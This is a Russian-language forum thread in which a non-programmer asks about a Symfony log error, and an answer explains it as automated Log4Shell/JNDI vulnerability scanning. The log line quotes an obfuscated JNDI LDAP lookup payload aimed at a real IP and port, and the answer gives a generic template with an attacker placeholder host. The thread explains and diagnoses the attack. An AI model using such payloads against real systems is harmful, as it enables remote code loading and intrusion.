В логах увидел непонятную ошибку. Как понять откуда она?

Question

[ne-programmist]

Увидел в логах такую ошибку (2 раза в разные дни):

request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\BadRequestHttpException: "Invalid method override "${J${K8S:K5:-ND}I:LDAP://185.8.172.132:1389/ND5E6PX}"." at /var/www/project/vendor/symfony/http-kernel/EventListener/RouterListener.php line 83

Подскажите с чем это может быть связано? Впервые такое вижу

Comments

[twobomb]

Какое-то недопустимое переопределение метода в файле /var/www/project/vendor/symfony/http-kernel/EventListener/RouterListener.php на 83 строке. Посмотри что там.

Answer 1

[Rst0]

1) похоже на вирусню, массовое сканирование уязвимости компонента JNDI на доступ к службе каталогов LDAP,
часть имени JNDI заменена юникодом
обычно в логах сервера дублируется чередой странных запросов.
схема запроса выглядит так:
${jndi:ldap://attacker_controled_website/payload_to_...}

2) X-Forwarded-Host не понятен для symfony

3) ip 185.8.172.132 порт 1389 папка ND5E6PX вам ни о чем не говорят - см. пункт первый.